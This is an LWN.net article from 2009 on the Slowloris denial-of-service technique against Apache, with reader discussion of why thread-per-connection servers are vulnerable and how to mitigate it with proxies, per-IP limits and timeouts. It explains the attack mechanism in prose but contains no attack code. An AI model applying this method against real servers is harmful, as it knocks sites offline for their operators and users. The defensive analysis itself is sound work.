Apache attacked by a "slow loris"
Please consider subscribing to LWN Subscriptions are the lifeblood of LWN.net. If you appreciate this content and would like to see more of it, your subscription will help to ensure that LWN continues to thrive. Please visit this page to join up and keep LWN on the net. |
The slow loris is an exotic animal of southeast Asia that is best known for its slow, deliberate movements. This characterizes the technique used by a new Denial of Service (DoS) tool that has been named after the animal. Slowloris was released to the public by security researcher "RSnake" on June 17. Unlike previously utilized DoS methods, slowloris works silently. Still, it results in a quick and complete halt of the victim's Apache web server.
The release of slowloris was only done after RSnake had contacted the Apache security team. Their response, while quick, was not quite what he expected:
RSnake commented that this response misses the point completely and that the security tips advertised are of no help. Subsequently, he released the slowloris script, which was followed by a confusing discussion that ranged over multiple blog postings, comments on the postings, as well as various mailing lists. On one side are those hard-boiled experts that say they knew about this technique for years and that it is nothing new. On the other side are those who think this is genuinely new or at least new to the public, and that it could have a devastating effect on the internet as a whole or at least on the half of the world wide web that runs on Apache. Another Internet Storm Center (ISC) post provides more context, along with some useful comments.
However, the majority seems to be stunned by the simplicity of the attack and the fatal effect of it, as well as being puzzled by the reaction of the Apache security team. The team's response makes it seem as if the slowloris attack is well-known, leaving Apache installations vulnerable to DoS by script kiddies, and that there is nothing the Apache developers can do to prevent it. Consequently, they also closed the bugzilla report.
One particular commenter expressed his concern on the full disclosure mailing list with the following words:
AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, Squid,
others...?
NOT AFFECTED
IIS6.0, IIS7.0, lighthttpd, others...?
It is not entirely clear which web servers have the means to defend against the attack, but there is general agreement that there is no way for Apache to completely defend against it, and that IIS is not vulnerable to the slowloris technique.
Looking more closely at the slowloris script provides an overview of the technique used. Slowloris gives the attacker a simple way to open an HTTP session with a server and to keep it open for a very long time — a lot longer than it would usually stay open: minutes or even hours.
The way the script achieves this goal can be likened to a person at a checkout lane in a store. Everyone has encountered someone paying the cashier, one by one — literally — in pennies. This can take time; often it feels like it is taking forever.
To the company that has a chain of several stores, this random person does not affect its business. For an online shop, however, there is a single URL and slowloris unleashes hundreds if not thousands of these people approaching the checkout lane with an endless supply of pennies ready to block the queue. For HTTP, slowloris uses HTTP headers instead of pennies, and it is ready to add a new header every 5, 10, or 299 seconds.
Unfortunately, the Apache at the cashier has no memory. With every penny dropped in its hands, it resets the timeout counter. With this technique it is rather simple to block every server thread or prefork process and bring the web server to a complete halt. Because the default timeout setting for Apache is 300 seconds, each header added can stretch things out for that much longer.
An unfortunate side effect of this attack method is that the access log of the web server will not show it is under attack. Also, the messages in the error log are likely to be sparse. The CPU will be idle, no disk IO will be done, and there will also be hardly any network traffic to be seen. All you can observe is a large number of open network connections in the ESTABLISHED state.
Obviously, this is an application level attack. In their book on Internet
Denial of Service, Mirkovic/Dietrich et. al noted that application
level DoS is difficult to handle: "[...] many defenses are not able
to help you defend against this kind of attack
".
So we are back to what the Apache Security team concluded: This is an inherent problem for servers. If you want to serve, then you have to accept clients, and, if they intend to block you, so be it.
But, let's not give up so fast. Obviously, if the well-known proprietary alternative from Microsoft, IIS, is not affected by this problem, there are other solutions. What IIS does differently, is in the way it handles incoming requests: There is no static tie between a worker thread and a network socket in IIS. Rather, the workers are organized in a pool where they wait for incoming TCP packets (rather than TCP connections as Apache does). These packets are then assigned dynamically to threads. So, an idle connection occupies a socket, but it does not block an entire thread. Thus the web need not be shut down by penny-wielding customers or slowloris.
Some developers pointed out that the AcceptFilter directive used in conjunction with FreeBSD's kernel http_accept filter should be ported to Linux in order to help with the defense. But, the http_accept filter only works with clear text traffic, so this defense will not work for business-critical services running over SSL (i.e. HTTPS).
It has already been noted that you can catch the single attacking IP address with netstat and block it via your firewall. Or you can use any of the Apache modules that limit the number of sockets allowed for a single IP address. Mod_qos seems best suited for this purpose. But this could block proxies or NAT routers that bundle multiple clients onto a single IP address. A threshold of 30 or even 100 sockets is nothing that should pose any problems to the clients behind these proxies, unless those sites are truly huge. Limiting connections to some threshold would help guard the server. But slowloris is only a proof of concept of a HTTP DoS. It could easily be extended into a HTTPS Distributed Denial of Service (DDoS) attack of a far nastier nature.
So it seems slowloris does not use the full potential of the attack method. The method can also be used more generally, which is why the name does not quite fit. The slow loris is an exotic animal, but the technique the script uses is not really exotic. It is very natural indeed: it attempts to delay an attack from the client side like slow internet connections used to do. So, if there is a term that describes the general form of the attack, then it should be "Request Delaying Attack".
In a follow-up blog post, RSnake has extended the concept to use keep-alive requests, and then delaying any subsequent requests. Other techniques are possible. They are described in great detail in a message to the ModSecurity mailing list from 2006.
Still, the attack has not yet been publicly observed in the wild, and there are still many experts that consider DDoS a non-issue.
RSnake did not claim to have invented the idea, in fact he points out that Ivan Ristić had described it in his book on Apache Security in 2005. Furthermore, posts in the various mailing lists suggest the concept has been around since the 90s, but RSnake has given this simple technique a wider audience.
Now that there is an audience, it is disturbing to see that the Apache
community has so little to say about possible defenses. There has been some
discussion
on how to handle it, but overall the market leader seems rather complacent
these days.
Index entries for this article | |
---|---|
Security | Apache |
Security | Vulnerabilities/Denial of service |
GuestArticles | Folini, Christian |
(Log in to post comments)
Apache attacked by a "slow loris"
Posted Jun 24, 2009 13:55 UTC (Wed) by nix (subscriber, #2304) [Link]
(Even that wouldn't fix a related problem, which is that it isn't hard to hit a system with so many incoming sockets that it can't accept anymore, either because of dstport saturation or simple kernel memory saturation with socket buffers. To fix this problem properly, obvious sluggards need to be not handled by a process that isn't DoSed but actually kicked off. Doing that without penalizing people behind slow or overloaded network links is... an interesting problem. Note that the problem can also occur the other way: send a request normally, for a valid page, then read the result very slowly so that things block right back into the webserver. It needs to be a big page, but those aren't hard to find.)
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:52 UTC (Wed) by hppnq (guest, #14462) [Link]
Hey, would it be possible to DoS the script kiddies who do not buy access to thousands of proxies, with a rogue Apache? ;-)
Apache attacked by a "slow loris"
Posted Jun 24, 2009 14:22 UTC (Wed) by mjthayer (guest, #39183) [Link]
Apache attacked by a "slow loris"
Posted Jun 24, 2009 14:49 UTC (Wed) by hppnq (guest, #14462) [Link]
That would not solve anything, but simply create another consumable, scarce resource.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:13 UTC (Wed) by mjthayer (guest, #39183) [Link]
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:49 UTC (Wed) by hppnq (guest, #14462) [Link]
You would run out of memory, I guess. My comment was mostly inspired by the observation that the DoS is caused by Apache's rather relaxed handling of the HTTP protocol, which in principle makes the lower-level data processing irrelevant. But of course the DoS would appear differently.You may want to take a look at network channels, by the way: your idea is really not crazy at all. :-)
Apache attacked by a "slow loris"
Posted Jun 28, 2009 20:23 UTC (Sun) by pphaneuf (guest, #23480) [Link]
No matter how you implement it, there's a fixed cap on the number of TCP connections per IP address. You could add IP addresses to a server, but that would be a waste of another precious resource, since during normal usage, most web servers can't handle the maximum number of connections of a single IP.
Apache attacked by a "slow loris"
Posted Jun 28, 2009 21:59 UTC (Sun) by dlang (guest, #313) [Link]
the limit is that you cannot duplicate the set
source IP
source port
destination IP
destination port
in about a 2 min period
when connecting to a server the destination port and destination IP are fixed, so a client can make lots of connections and make it so that no other connections could be made from that source IP, but that doesn't hurt anyone else.
that also isn't the attack that's happening here.
Apache attacked by a "slow loris"
Posted Jun 28, 2009 20:43 UTC (Sun) by pphaneuf (guest, #23480) [Link]
I think the key difference is how timeouts are handled. If the 300 seconds timeout in Apache is reset at every header (or worse, at every packet received, which could be one character each!), then you could stretch something for a long time. Maybe lighttpd and IIS do something like give it 300 seconds to get all the headers, and after that, too bad, you're just cut off (freeing the TCP port for another connection). You could still mount some sort of DoS attack, but the attacker would have to keep it up more intensively, so that very few legitimate clients manage to slip by as well as Slowloris does for affected servers (which is eventually a 100% effectiveness, with next to zero difficulty for the attacker).
Apache attacked by a "slow loris"
Posted Jun 28, 2009 22:05 UTC (Sun) by dlang (guest, #313) [Link]
hopefully this will force the apache team to tackle this issue and seperate the timeouts, but from the article it sounds like they are not responding well.
they are right that the basic attack approach of having a botnet of servers connect to an apache server and tie it up is an old attack that has been possible forever. fixing the timeout issues will not address that, and even after fixing the timeouts the attackers can kill the apache server by making legitimate requests that take time to process, but fixing the timeouts will go a long way towards leveling the playing field again, right now it's tilted heavily in favor of the attackers.
Apache attacked by a "slow loris"
Posted Jun 29, 2009 1:20 UTC (Mon) by njs (subscriber, #40338) [Link]
The original report said that Squid was affected, but the Squid maintainers can't reproduce it (http://www.squid-cache.org/bugs/show_bug.cgi?id=2694); looks like a mistake in the original report to me.
> and IIS uses a thread-per-connection (if I recall correctly)
The article here claims that IIS does not use thread-per-connection, but rather some sort of asynchronous state-machine design (like lighttpd or squid) plus a thread pool to parallelize that state-machine.
> Maybe lighttpd and IIS do something like give it 300 seconds to get all the headers, and after that, too bad, you're just cut off
No -- they just handle the slow connection as normal. The difference is that for them, an idle connection costs a few bytes of memory describing that connection, and one can easily have thousands of these data structures sitting around without anyone noticing. For Apache, an idle connection ties up an entire server process, and for various reasons you can't have thousands of server processes sitting around.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:05 UTC (Wed) by epa (subscriber, #39769) [Link]
Apache attacked by a "slow loris"
Posted Jun 25, 2009 16:25 UTC (Thu) by iabervon (subscriber, #722) [Link]
HTTP is "stateless" only in that you often return to the default state, not in that you never leave the default state. UDP is only really appropriate for cases where you don't care if your message is received and you won't get a response to it.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:35 UTC (Wed) by mjthayer (guest, #39183) [Link]
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:59 UTC (Wed) by mjthayer (guest, #39183) [Link]
Apache attacked by a "slow loris"
Posted Jun 24, 2009 20:49 UTC (Wed) by aliguori (subscriber, #30636) [Link]
The Right Thing to do is to use a state machine to process incoming requests so that a single thread can handle many requests at once. You will then be bound by processor/memory/bandwidth.
You could still do a slowloris attack against ISS but it becomes a traditional DoS because you have to be able to exhaust the web servers resources with your local resources. What makes Apache vulnerable here is that you don't need a lot of resources on the client to exhaust Apache's resources regardless of how much more powerful the server is.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 21:05 UTC (Wed) by mjthayer (guest, #39183) [Link]
All modern OSes offer alternative
Posted Jun 25, 2009 4:23 UTC (Thu) by khim (subscriber, #9252) [Link]
Have you seen surveys? Do you know WHY nginx is growing so fast? Do you even know WHAT the nginx is? It's caching web-server. It can serve static web- pages and protect "real" server (often Apache server) from slowloris attack. And it DOES NOT use "a heavy-weight polling syscall" - all moder operating systems offer alternative...
P.S. The real motivation was not to fight slowloris attack - it was to reduce server load when it talks with thousands of dial-up clients. Think about it: if you have huge number of very slow clients the dynamic is the same! Server processes or threads are tied for minutes when they serve "feature-rich" pages to clients who only consume 1Kb per second. Apache was unable to work with it (nginx author tried to fix it for years) so new web-server was born. And as statistic shows real admins who are in charge of real sites know all about this problem. Tempest in a teapot...
All modern OSes offer alternative
Posted Jun 25, 2009 4:31 UTC (Thu) by quotemstr (subscriber, #45331) [Link]
Why do you need an entirely new web server? Couldn't you do the same thing with a caching reverse proxy like Varnish? That way, you only need to configure one set of servers.
All modern OSes offer alternative
Posted Jun 25, 2009 4:45 UTC (Thu) by khim (subscriber, #9252) [Link]
Why do you need an entirely new web server?Because you need solutions, not a buzzwords? I've explained why you need two servers below. Without "real" web server you can serve static pages (icons, images, etc) via sendfile(2) - and this is important for real-world servers.
Couldn't you do the same thing with a caching reverse proxy like Varnish?You can name your frontend server "web server", "web accelerator" or use any other term, but if your frontend is "heavily threaded, with each client connection being handled by a separate worker thread" then you just added complexity without any benefits. What'll happen with your frontend if you'll have 50'000 clients with opened connections? Nginx can handle such load on medium-sized system.
That way, you only need to configure one set of servers.You still need to configure server. Nginx was designed from the ground up to do two things and do them well:
1. Serve static pages.
2. Work as http-accelerator.
All modern OSes offer alternative
Posted Jun 25, 2009 5:43 UTC (Thu) by quotemstr (subscriber, #45331) [Link]
Because you need solutions, not a buzzwords?This coming from somebody who's hawking a specific product as the solution to a whole class of problems? I don't think I'm the one who has to worry about buzzwords here.
You still need to configure server.Reading the nginx webpage, it appears you can configure nginx as a caching reverse proxy. That's fine. My issue is that you pretend it's the only game in town when really, any caching reverse proxy will do. (And feature sets may differ; Varnish, for example, appears to have a more sophisticated load balancer.)
Also, I can't fathom why you would want your web accelerator serving content on its own. A caching reverse proxy setup is the only one that makes sense to me: that way, you have one place to configure what's served: the back-end servers. Because the back-end servers already mark what's static and what's not (via cache-control HTTP headers), you shouldn't have to do anything special to push static content to the front-end server, and the reverse proxy asking the back-end servers once in a while for some static content won't make a difference in the overall load.
All modern OSes offer alternative
Posted Jun 26, 2009 12:21 UTC (Fri) by tcabot (subscriber, #6656) [Link]
On the other hand, let's say that your site serves massive quantities of "interesting" image files (which I understand was the original use case for nginx). In that case the server needs to be extremely efficient because the working set is so large that a cache wouldn't do much good.
Horses for courses.
Varnish is the answer
Posted Jun 26, 2009 13:04 UTC (Fri) by dion (guest, #2764) [Link]
If all you want to do is to mitigate a Slow Loris attack then just move your web server to a different port and start Varnish with the default configuration on port 80.
nginx vs slowloris
Posted Jul 4, 2009 17:18 UTC (Sat) by gvy (guest, #11981) [Link]
Vitya, linux.kiev.ua is running nginx + apache-1.3 and it's rather depressed by slowloris in my tests. Could you please elaborate on how to cook things up so as to protect dynamic paths? I could only come up with proxying stuff for at least some fixed minimal timeout (which is not an option for lots of pages) and googling 'nginx slowloris' doesn't yield anything particularly useful to me.PS: nginx is really an excellent static httpd/reverse proxy, anyone running moderately busy site should consider looking into it. Could drop apache instance numbers an order of magnitude, together with RAM occupied by those.
Apache attacked by a "slow loris"
Posted Jun 25, 2009 4:29 UTC (Thu) by quotemstr (subscriber, #45331) [Link]
So you're talking about having Apache implement TCP in userspace? That makes no technical sense whatsoever. The kernel implementation is thoroughly debugged, mature, patched regularly, and faster to boot. Apache will have to maintain just as much state as it does today, and moving TCP to userspace solves nothing.A "socket" is just a handle to a tiny bit of state information describing the connection, and of course it's the right abstraction. It's what the protocol is specified to use, and in-order, streamed delivery is the perfect medium for HTTP anyway.
The real problem here is what Apache does after it reads data from a socket. Recall that both lighttpd and IIS use sockets (just like every other network daemon on Earth), and they are not vulnerable to this attack.
The counter to this attack is simple, really, and it's conceptually the same as a counter to a SYN flood: only commit your resources when the remote party has committed his own. The problem here is how to shoehorn that idea into Apache's model, which commits resources (in this case, processes) very early.
Here's one uninformed idea: accept connections and read HTTP requests in one master process, asynchronously. Only when a complete request has been read send the file descriptor of the connection to a worker; the actual handoff can be achieved using a SCM_RIGHTS
over a unix domain socket.
Apache attacked by a "slow loris"
Posted Jun 27, 2009 15:06 UTC (Sat) by dmag (guest, #17775) [Link]
No, having a generic library for TCP in user space.
> That makes no technical sense whatsoever.
Please read the linked article. http://lwn.net/Articles/169961/
> The kernel implementation is thoroughly debugged, mature, patched regularly,
Agreed.
> and faster to boot.
No. Right now, the driver gets the packet, later the kernel gets around to looking at it (maybe doing checksums, etc), and then much later userspace requests it. If each of these happen on a different CPU, you will waste thousands (ten thousands?) of instructions because of CPU caches and data locking issues.
To become a better programmer, read this: http://lwn.net/Articles/250967/
It's really long, but pay attention to the parts where loops get 10x faster just by re-arranging data structures.
> The real problem here is what Apache does after it reads data from a socket.
Agreed. TCP sockets is icing on the cake once you've solved the current bottleneck.
> Here's one uninformed idea: accept connections and read HTTP requests in one master process, asynchronously.
But why does that process *have* to be Apache? Just put another web server in front of it (Nginx,Varnish, etc.). Apaches is really a "big and expensive" single-threaded application server (mod_php, mod_passenger, mod_perl, etc). In fact, Apache isn't especially good at serving static files either. I have to admit, Nginx has the best architecture, (but consider Varnish if caching is a big win).
It's like when you go to the big warehouse stores, and before you get to the front of the line, some guy with a scanner has already scanned your cart, and all you do is pay at the register without waiting.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 14:33 UTC (Wed) by bangert (subscriber, #28342) [Link]
many connections, each of which dont seem to be doing anything... first time around was roughly 2
years ago IIRC
it happened too rarely to warrant the implementation of mod_qos/mod_security, but i expect it would
have worked fine. the ad-hoc solution was a firewall block on the offending ip.
does someone know of an mpm, which implements IIS's behavior?
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:17 UTC (Wed) by wzzrd (subscriber, #12309) [Link]
There are no such mpm and there will never be such an mpm
Posted Jun 25, 2009 4:33 UTC (Thu) by khim (subscriber, #9252) [Link]
does someone know of an mpm, which implements IIS's behavior?
This is huge design question: do you want extesibility in your web server or not? Suppose someone went and implemeted such an mpm. Then you server got state machine and everything. Now - what'll happen if single thread is hadnling 1000 clients in your server and this thread called php interpreter? 1000 angry clients, that what (think about it).
To make such scheme usable you need to split web-server in two: lighweight frontend (with state machine, fancy kernel interface and everything) and backend (with php, mysql connections and so on). And guess what: such scheme is implemented and as last survey shows it is used by millions. The fact that frontend is called nginx and not "apache enhanced engine accelerator" does not change anything.
There are no such mpm and there will never be such an mpm
Posted Jun 25, 2009 5:51 UTC (Thu) by quotemstr (subscriber, #45331) [Link]
...you need to split web-server in two: lighweight frontend (with state machine, fancy kernel interface and everything) and backend (with php, mysql connections and so on).Agreed.
The fact that frontend is called nginx and not "apache enhanced engine accelerator" does not change anything.There are many different ways of realizing the frontend-backend split, and nginx is just one of them. You can use FastCGI server processes; you can run a conventional proxy as a reverse proxy; you can run a specialized reverse proxy that's not called nginx; you can use akamai; or you can do a thousand other things. Plenty of people manage to split their front and back-ends without using nginx.
There's a word for people who deliberately conflate the conceptional model of a solution with a specific implementation of that solution: salesmen.
Sure, nginx is pretty neat, but it's not the only way to implement what we agree is the necessary architecture.
There are no such mpm and there will never be such an mpm
Posted Jun 28, 2009 19:41 UTC (Sun) by marcH (subscriber, #57642) [Link]
But there is worse: those who do not! Software patent lawyers.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:28 UTC (Wed) by mcmanus (guest, #4569) [Link]
An async architecture based around epoll would certainly make the thing scale much better - I've worked on systems that could handle 100,000 idle (or extremely slow) http connections without meaningfully impacting the performance of a few hundred live ones. Such an architecture is even mentioned on the apache-dev link that is provided in the article, so its not like that's news.
But that kind of hand-managed parallelism development style is what a thread is meant to abstract away. The real question to me is why threads are such a scarce and/or unscalable resource?
Specifically, I am curious to know what happened to all the talk of linux 2.6 and 100,000 concurrent threads from a few years back: http://kerneltrap.org/node/422
Should the default config be cranking up the max number of thread allocations (and the default stack sizes for them down), and if not - where is the bottleneck that prevents that?
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:34 UTC (Wed) by mjthayer (guest, #39183) [Link]
Apache attacked by a "slow loris"
Posted Jun 24, 2009 16:17 UTC (Wed) by NAR (subscriber, #1313) [Link]
Anyway, is this bug HTTP-protocol specific? I'd guess it can affect any services which are expected to keep a session open for a long time, if the client can use a lot less memory for each connection than the server...
Apache attacked by a "slow loris"
Posted Jun 25, 2009 9:52 UTC (Thu) by Darkmere (subscriber, #53695) [Link]
This "bug" is the same as the SMTP tarpit and others, but instead of working on the server side, it works on the client side, against the server.So, it works on the same basis that so many other attacks do, find a limited resource on the server, find a way to make the server hit that limit, lean back and reap profits.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 16:20 UTC (Wed) by mcmanus (guest, #4569) [Link]
Obviously you can't use all of the vmm map for thread stacks - but you can use a lot of it. And if 32KB is not enough, then its a state problem not a threading problem (i.e. an async design scenario would need to stash the state somewhere too)). Plus apache has that hybrid process/thread model, so each process has its own vm map.
Maybe 100K threads is hyperbole if you're all in one process, but 50+K seems quite reasonable from a memory management standpoint and makes a thread much less of a scarce resource than it is in the default apache config (2 or 3 hundred iirc).
I'm more curious if Linux kernel/libc could handle the creation and scheduling of so many threads. If not then that's kind of a setback from the direction of things when 2.6 was being released (see the link I provided last post), and if it can it seems a much easier approach than rearchitecting the application.
Fundamentally, isn't this multiplexing the kind of thing the OS should be doing for you efficiently?
Apache attacked by a "slow loris"
Posted Jun 24, 2009 16:31 UTC (Wed) by smurf (subscriber, #17840) [Link]
Apache is generally configured so that the maximum number of _real_ work threads (i.e. including all that state) doesn't cause the system to swap excessively. A slowloris connection eats much fewer resources than that, but Apache doesn't know that and thus reaches the configuration's limit far too quickly.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 17:03 UTC (Wed) by mcmanus (guest, #4569) [Link]
But it does seem to me that if what Apache is trying to prevent is memory exhaustion, then it should be doing admission control based on memory allocated instead of using max clients as a poor stand-in. Especially as the two don't correlate well at all even in normal (i.e. non DoS) situations.
Apache attacked by a "slow loris"
Posted Jun 25, 2009 5:29 UTC (Thu) by quotemstr (subscriber, #45331) [Link]
(Reading this over, it's a bit of a ramble. Sorry about that.) Virtual memory isn't the problem per se. Apache isn't running out of virtual memory. The attack is against Apache's own limit on the number of simultaneous outstanding requests. Returning to the supermarket analogy, the problem isn't running out of space in the store for cashiers, but simply tying up all the existing ones.Now, you can increase these limits in order to defeat the attack. There's the problem: Apache's resource consumption can be too high to service the number of simultaneous connections required. For prefork servers, the problem is especially severe: each simultaneous request requires its own process. Now, any serious operating system can handle thousands of processes; that's not the problem. You can even have thousands of Apache processes, since Apache workers are actually pretty light, memory-wise, and all the code and some of the data structures are shared among all workers.
More an issue is the mod_*
idiocy that embeds an interpreter in each worker process*. Then, when you have thousands of processes, you run into a problem far more severe than virtual address space exhaustion: swap thrashing, poor performance, machine lockups, and OOM killing sprees.
Using threads, in principle, helps the problem. Each thread shares the same process, meaning the additional memory occupied by each new simultaneous connection is just the memory needed to keep track of that connection; if all the threads share a single copy of the interpreter and other data structures, I bet you can avoid the slowloris problem entirely by simply setting connection limits high enough.
A small variant of this approach is to use multiplexed I/O, as in lighttpd; that's like using the threaded approach above, but you don't need a thread stack for each simultaneous connection. In practice, if you make the thread stack small enough, you can still fit thousands in a 32-bit virtual address space.
The problem with threads is that you need threads, though! The free world's most inexplicably-popular web scripting language, PHP, doesn't have a thread-safe interpreter. That limitation us to another solution: divorce the heavyweight state from the HTTP handler, and use something like FastCGI to communicate to the interpreter. That way, you can have as many (cheap) HTTP connection handlers (threads, processes, or state machines) as you'd like, and still limit the number of heavyweight interpreters you need. (Using a separate processes for the heavy lifting is better than mixing all the threads together anyway; see below.)
To deal with slowloris attacks, just batch all the headers up in a request before sending the whole request on to the heavyweight process that actually does something meaningful with it. (That's what mod_fastcgi does.) That way, a slowloris-using attacker can pound away at the lightweight worker thread (or process), and only when a complete request is read will the system actually commit to using a significant resource, one of the heavyweight FastCGI servers.
lighttpd can't use embedded interpreters; it's state machine precludes that. Instead, people generally set it up to use FastCGI: guess why lighttpd is not vulnerable to slowloris attacks. If you configure Apache appropriately, you can make it work similarly.
(Before you say, "but wait! FastCGI is pretty slow!" -- that's simply not true. The HTTP user-agent's communication to the server is orders of magnitude slower than the local communication between Apache and a FastCGI server. The FastCGI communication doesn't add any meaningful time to each request, so it doesn't increase latency. And since each application is sequestered into its own process instead of running in each worker process in Apache, total memory use can actually be lower than the mod_*
model.
As if that weren't a good enough reason to use FastCGI (or something similar, like scgi), it's also a lot easier to keep track of your web application's system resource usage as distinct from the web server's. You can actually measure the CPU consumption of, say, squirrelmail without conflating it with Apache's.)
Oh, and there's an even better reason: nothing forces a FastCGI server to run as the same user as the web server. Finally, you can put an end to anything remotely related to the web having to be owned by apache
. Each application can have its own user, and be limited to its own little corner of the machine just like any other kind of network-facing daemon. Really, mod_*
is just an ugly hack that's completely unnecessary today.)
Apache attacked by a "slow loris"
Posted Jun 24, 2009 19:22 UTC (Wed) by guus (subscriber, #41608) [Link]
Apache attacked by a "slow loris"
Posted Jun 25, 2009 15:35 UTC (Thu) by elanthis (guest, #6227) [Link]
Honestly, if at the end of the day you don't need any of the Apache modules (maybe you're using regular CGI or fast-CGI or something), then just don't use Apache, but instead use one of the newer, more efficient, more scalable Open web servers, like lighttpd, cherokee, etc.
(Unfortunately, the lack of .htaccess support in those servers, and hence the lack of mod_rewrite-compatible user-configurable rewrites and redirects, is a real issue for a lot of hosts. If those servers added an optional module for basic .htaccess-like support, they'd probably skyrocket in adoption.)
Apache attacked by a "slow loris"
Posted Jun 24, 2009 16:38 UTC (Wed) by drag (guest, #31333) [Link]
People above were talking about running out of memory and socket limitations and things like that...
But I don't understand why Lighttpd and IIS is not affected, but Apache is. Can anybody explain that to me?
If it only seems to affect Apache then the solution to solving the problem should be pretty obvious.. other sorts of web servers are very common and their behavior should be well known!
Apache attacked by a "slow loris"
Posted Jun 24, 2009 17:05 UTC (Wed) by tialaramex (subscriber, #21167) [Link]
In contrast the design in products like IIS allocates nothing but a socket and a little bit of working space until the "slow loris" has written out a whole request which can be answered. Many, many more such requests can be tolerated on the same hardware.
Thus, a thousand "slow loris" connections to your IIS are merely an annoyance, nothing that needs urgent action, while on Apache they've probably effectively taken your site off the Internet.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 17:59 UTC (Wed) by drag (guest, #31333) [Link]
Which is, generally, a good solution for people with servers that use a lot of server-side scripting anyways.
Or something
Posted Jun 25, 2009 4:53 UTC (Thu) by khim (subscriber, #9252) [Link]
So the easy solution, I suppose, is just to use Lighttpd or something like that as a reverse proxy for your Apache server.If you look on the latest survey you'll find out that millions are already running "something like that". Nginx was designed from ground up to work in such situation - if you know your apache process usually generates page 100K in size you can specify this as buffer size to nginx and then your "real" server will be freed in milliseconds and when occasional long page will be generated nginx will wait for backend. Lighthttpd uses similar architecture, but it's less configurable when used as http-accelerator.
And of course when you send static pages it makes perfect sense to use sendfile(2) and forget about everything (nginx does more or less that - just a few small structures to handle "keep alive" connections).
That's why I can not see what's so important happened: this is well-known apache problem but while it can not be solved with apache alone it can be solved with additional software - and was solved for years by real admins on millions of systems.
Apache attacked by a "slow loris"
Posted Jun 28, 2009 20:38 UTC (Sun) by job (guest, #670) [Link]
Any simple select-loop (or poll)-based web server would do. But as soon as you serve dynamic content in any way, be it via PHP or any other language, the problem is back again. Most (all?) web site languages are served by worker processes, either built into the web server or stand alone pre-forked.
Disarming the attack only on static file URLs is not really a solution. The attack would probably choose apparent dynamic URLs such as .php if this was a real world attack anyway.
Apache attacked by a "slow loris"
Posted Jun 25, 2009 0:34 UTC (Thu) by JohnDickson (guest, #7406) [Link]
The event MPM apparently isn't vulnerable to Slowloris (just like lighthttpd, IIS etc.). However, it's apparently incompatible with mod_ssl and some other input filters, so it's not a solution for us.
This is fundamental problem
Posted Jun 25, 2009 5:09 UTC (Thu) by khim (subscriber, #9252) [Link]
The event MPM apparently isn't vulnerable to Slowloris (just like lighthttpd, IIS etc.). However, it's apparently incompatible with mod_ssl and some other input filters, so it's not a solution for us.
Single thread can not simultaneously handle many thousands connections and do heavy-duty processing (PHP, SQL database requests, etc). First one requires response in nanoseconds, second one sometimes take seconds. And when you split these two operations in two threads frontend-backend scheme becomes quite natural. You can use nginx to handle enormous loads with a single decent server and then safely use as many backend systems as needed. It IS possible to create faster and less resource-hungry server then nginx+apache combo, but if you need to alter existing installation... there are no contest.
The only thing nginx really needs is decent documentation...
This is fundamental problem
Posted Jun 25, 2009 9:41 UTC (Thu) by dgm (subscriber, #49227) [Link]
But not passionate advocates, it seems.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 17:05 UTC (Wed) by bradfitz (subscriber, #4378) [Link]
impression that this was already widely known and that's why people don't put
Apaches ever facing end users directly and always put a smart reverse proxy /
load balancer in front that protects Apache.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 18:37 UTC (Wed) by kjp (guest, #39639) [Link]
Apache attacked by a "slow loris"
Posted Jun 25, 2009 1:07 UTC (Thu) by gdt (subscriber, #6284) [Link]
More generally, you can play a similar game with TCP Acks.
The underlying change has been the growth of botnets. One upon a time DoS attacks had to have leverage -- to consume much more resources on the attacked than on the attacker. But botnets allow a 1:1 leverage to be acceptable to an attacker. This opens a new world of unexplored DoS vectors.
Apache attacked by a "slow loris"
Posted Jun 25, 2009 3:53 UTC (Thu) by marineam (guest, #28387) [Link]
There is an Apache module called mod_limitipconn floating around that I used to limit each individual ip address to about 20 concurrent connections which seemed to to be a reasonable compromise number between killing the damn broken download accelerators and allowing legitimate proxies for my traffic.
Time them out
Posted Jun 25, 2009 6:56 UTC (Thu) by man_ls (guest, #15091) [Link]
I'm probably stating the obvious, but why not cut each client after a total time of, say, 20 seconds? Genuine clients should not take more than that in making a request. Such a global timeout would only damage extremely slow network links, which might (arguably) be better off cutting the connection short. Quite often I've seen my trusty Firefox waiting minutes for a site which, unsurprisingly, does not come out after all.Combined with something like what you say (20 connections per IP) it would severely limit the damage of this attack. Each individual slow loris would only be able to tie up 20 threads for 20 seconds. So you would need a fairly extensive network to take a site up.
Time them out
Posted Jun 25, 2009 10:16 UTC (Thu) by MathFox (guest, #6104) [Link]
Time them out
Posted Jun 27, 2009 13:10 UTC (Sat) by jengelh (subscriber, #33263) [Link]
Apache attacked by a "slow loris"
Posted Jun 25, 2009 5:15 UTC (Thu) by thedevil (guest, #32913) [Link]
Teergubbing
Posted Jun 26, 2009 0:06 UTC (Fri) by xoddam (subscriber, #2322) [Link]
Tomorrow google will find a document or two at lwn.net.
But I'll probably be none the wiser :-)
Teergubbing
Posted Jun 26, 2009 2:17 UTC (Fri) by njs (subscriber, #40338) [Link]
Teergrube = tarpit
Posted Jun 26, 2009 3:26 UTC (Fri) by xoddam (subscriber, #2322) [Link]
Teergubbing
Posted Jun 30, 2009 1:33 UTC (Tue) by rickmoen (subscriber, #6943) [Link]
I have no doubt that subscriber "thedevil" merely mistyped "teergrubing".Rick Moen
rick@linuxmafia.com
Apache attacked by a "slow loris"
Posted Jun 26, 2009 20:42 UTC (Fri) by dlang (guest, #313) [Link]
in my opinion, the fix here is for apache to change how it does timeouts.
it currently has one timeout variable that is used for three things.
1. time from initial connection to when it gets the header
2. idle time while waiting for new data to arrive
3. total time that a CGI is allowed to run.
